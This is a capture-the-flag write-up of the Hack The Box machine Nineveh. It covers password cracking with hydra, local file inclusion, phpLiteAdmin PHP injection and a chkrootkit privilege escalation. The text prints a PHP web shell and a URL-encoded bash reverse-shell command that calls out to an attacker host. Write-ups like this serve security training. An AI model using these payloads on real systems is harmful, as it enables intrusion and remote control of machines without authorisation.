> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-nineveh.md).

# HTB - Nineveh

## Enumeration and Foothold

### NMAP

```bash
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FV660MwgXXGlVxJKmVFBq%2Fimage.png?alt=media&amp;token=d0bc7ee4-868b-4f6d-abf6-41199ab36935" alt=""><figcaption></figcaption></figure>

Browsing to http port displays that the web server is running nothing interesting here.

directory enumeration revealed a interesting directory called department which on browsing reveals a login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsR03xo3GKmWYl1VhhXte%2Fimage.png?alt=media&amp;token=f9cf3c02-7e97-41cd-8ecd-b5aa16e7fdf2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fx2bzhMZ0775qt3NU0IiA%2Fimage.png?alt=media&amp;token=799b0fc2-a508-4277-9469-291e0ca65b26" alt=""><figcaption></figcaption></figure>

the source code reveals usernames among which admin is a valid user.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvSKfe0S77xCRXqT22Ksk%2Fimage.png?alt=media&amp;token=60f0bab0-cdf6-471d-a776-a059af8dbac7" alt=""><figcaption></figcaption></figure>

all the common weak passwords do not work here.

i will get back to it later.

### HTTPS

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FH3lX9VWamuUMxiHhnHK5%2Fimage.png?alt=media&amp;token=4288c6b9-9572-41f9-b761-7a634d8d6749" alt=""><figcaption></figcaption></figure>

directory enumeration on https port revealed path to index.php and a interesting directory called secure-notes.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzK8iCI949KbZvqKtBh6y%2Fimage.png?alt=media&amp;token=1dd5e7c1-8072-4dfa-8156-a9e8de7350fe" alt=""><figcaption></figcaption></figure>

Browsing to index,php reveals a login page for `phpliteadmin` and also reveals the version used.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxOxnxxFdkf21rqz2u5xw%2Fimage.png?alt=media&amp;token=db5042e0-2574-4873-abaa-8bda23d6c7c9" alt=""><figcaption></figcaption></figure>

also browsing to secure\_notes displays a image.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMyWf5kgOsgoKBLAunNxl%2Fimage.png?alt=media&amp;token=668833aa-f0be-4230-9db8-d18bd2a74257" alt=""><figcaption></figcaption></figure>

running the following command reveals that the image is embedded with sensitive info

```
strings nineveh.png
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIjYhy3mfv59oKVehWeF9%2Fimage.png?alt=media&amp;token=196343aa-e688-4433-afe8-1ecbb4fe4bd3" alt=""><figcaption></figcaption></figure>

leaks the ssh keys but cannot use them as the ssh port is not open.

that said i guess the phpliteadmin could be the way

#### Cracking passwords using hydra

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FSSenhMzgGJUZ7kN3zDgg%2Fimage.png?alt=media&amp;token=ec696865-f35d-4e53-8070-64b87d9e73ec" alt=""><figcaption></figcaption></figure>

and the password is cracked by using hydra.

`admin : password123`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9BUCiKphKbqVd5rZRmzL%2Fimage.png?alt=media&amp;token=856563bf-aa35-4439-aeef-4c10183eec0a" alt=""><figcaption></figcaption></figure>

since the password cracked using hydra i will do the same process on the login page found earlier on department directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIfUq9oZ2c1Pko4xeedxX%2Fimage.png?alt=media&amp;token=de4e242c-3fca-4f6a-a51f-1e58a9a2c0ce" alt=""><figcaption></figcaption></figure>

password is cracked too.

`admin : 1q2w3e4r5t`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRfJaxobd4ktF56rrE4Wv%2Fimage.png?alt=media&amp;token=67a13229-2008-47b6-a750-339f24a5202e" alt=""><figcaption></figcaption></figure>

clicking on notes reveals the below info&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2dWDAFXtLzNMJ83TnO5c%2Fimage.png?alt=media&amp;token=de1b9462-77fd-4261-b87c-79a273dc18e2" alt=""><figcaption></figcaption></figure>

also one important thing here is that in the url notes parameter directly references the notes file which is a potential for LFI.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FSaZJp743LsK0IMAQ24lR%2Fimage.png?alt=media&amp;token=929f08b1-43ce-4261-90af-ac683112e6e2" alt=""><figcaption></figcaption></figure>

says no note is selected that means it requires a note to be selected.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQzJQIia6Ig0DGw2D7oRS%2Fimage.png?alt=media&amp;token=7b3a324a-51fd-47ac-81b5-256fc338318e" alt=""><figcaption></figcaption></figure>

poking around the LFI finally worked.

that said i cant do anything here yet let me shift focus on to the phpliteadmin.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fx86AzEUZcBijd7wNUVdH%2Fimage.png?alt=media&amp;token=47f784b5-dd2b-41c8-ba70-abfde4aaee55" alt=""><figcaption></figcaption></figure>

phpliteadmin is vulnerable to authenticated phpcode injection.

An authenticated user can abuse the application to create a new database with a .php extension. By creating a table with a field containing arbitrary PHP code (e.g., ), the attacker can achieve remote code execution (RCE) by directly browsing to the newly created database file.

{% embed url="<https://www.exploit-db.com/exploits/24044?source=post_page-----efa2db1bc5da----------------------------------------->" %}

i will create a database called ninevehNotes.txt.php since it expects a notes file to be selected.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHc7aU5Kl89lQAjFtgXg9%2Fimage.png?alt=media&amp;token=b8ca293c-e598-4060-b807-b2f4e709cea3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhPgyKFYrkqmUdC52HGJa%2Fimage.png?alt=media&amp;token=7896419c-63cf-42d5-a349-ab3e2ef4e259" alt=""><figcaption></figcaption></figure>

instead of php info i will put a web shell

```
<?php system($_REQUEST['cmd']) ?>
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwjdciBtp2ysJYlcnyTyR%2Fimage.png?alt=media&amp;token=70641e0c-ec98-4823-95b3-de92153af2ca" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1joIDcOC8IdW1Zp5FDNg%2Fimage.png?alt=media&amp;token=584eaea6-df88-4d0c-acb7-9cb0cf6e2dd3" alt=""><figcaption></figcaption></figure>

i dont know how to access this so clicking on rename leaks the path.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFriyNOvTZUL2tNCCuwgm%2Fimage.png?alt=media&amp;token=a29c48c9-07fd-4e3f-a6d5-225b670706c4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6xcPfDFpO9h0EH9j0X10%2Fimage.png?alt=media&amp;token=083904c4-2b64-4ade-bf65-63f30f938fc0" alt=""><figcaption></figcaption></figure>

that said i can use it to get reverse shell.

## Shell as www-data

```
http://10.129.90.144/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&cmd=/bin/bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.14.52/4444+0%3E%261%27
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo21GVVkiQZUaibI4PJNP%2Fimage.png?alt=media&amp;token=98affafc-3908-4830-a44d-8e8e8d576fb9" alt=""><figcaption></figcaption></figure>

upgrade the shell

```bash
www-data@nineveh:/var/www/html/department$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<tml/department$ python3 -c 'import pty; pty.spawn("/bin/bash")'             
www-data@nineveh:/var/www/html/department$ export TERM=xterm
export TERM=xterm
www-data@nineveh:/var/www/html/department$ 
```

earlier we found the ssh keys fro amrois we can use that key from the shell to get shell as amrois or i can even enable ssh port by opening it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDEdbPxq0Gk8wMrGhOzNt%2Fimage.png?alt=media&amp;token=f79d5f15-0e50-4827-93fe-2b7db234f47b" alt=""><figcaption></figcaption></figure>

give permissions.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLbzDO8ejB5cJssqtm8Ev%2Fimage.png?alt=media&amp;token=f3c00aa3-b86f-4b5c-a180-f85cfbd9865c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fpc518ADPY199Idda050h%2Fimage.png?alt=media&amp;token=ce59a899-2f00-4797-b919-964a1d6e0e58" alt=""><figcaption></figcaption></figure>

port 22 is open and listening.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FSQccBRZy3pRD2HySY7JP%2Fimage.png?alt=media&amp;token=25fb2b3f-2aba-4c3d-84f2-e7a244c852c5" alt=""><figcaption></figcaption></figure>

root is running knockd

#### Knockd

**Knockd** opens an SSH connection only if a specific knock sequence is initiated

i can read its config from below file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fan9bBICbkN7gn3lpJGqQ%2Fimage.png?alt=media&amp;token=ce820b4e-77e3-4265-a1a9-17e145c0aa56" alt=""><figcaption></figcaption></figure>

this says i can open ssh by running the sequence 571,290,911.

that said we need to run the command from our machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUusEtMvUlBZtlFa6zhkB%2Fimage.png?alt=media&amp;token=d530de1a-547d-464b-a733-70c0a321ab39" alt=""><figcaption></figcaption></figure>

there is a report directory in the root and the report file contain regarding checks on files if they are infected or not.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FX3YL8wyBgpwvzcO0aQeC%2Fimage.png?alt=media&amp;token=79e801eb-bb46-4613-9a04-c42a03172c68" alt=""><figcaption></figcaption></figure>

that said i will check if root running any process that is generating those reports.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0CknDWlQc7SF8jsDx4Di%2Fimage.png?alt=media&amp;token=7bb3d85d-d2b8-4b99-b3fa-7e649529f5d0" alt=""><figcaption></figcaption></figure>

root is running a vulnscan script and also running chrootkit which can be sued to gain access as root.

[chkrootkit](http://www.chkrootkit.org/) is a tool that will check a host for for signs of a rootkit.

### Chkrootkit

{% embed url="<https://www.exploit-db.com/exploits/33899>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvyAkPKRdHRPBpFzKgcmA%2Fimage.png?alt=media&amp;token=acbe8f6f-f218-4309-9d1b-228aa9a25245" alt=""><figcaption></figcaption></figure>

in a minute we get reverse shell as root

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTsdBOXNEnwT7DDB909zs%2Fimage.png?alt=media&amp;token=9df9b727-5e69-4eb8-b003-80a00e1ebac0" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-nineveh.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
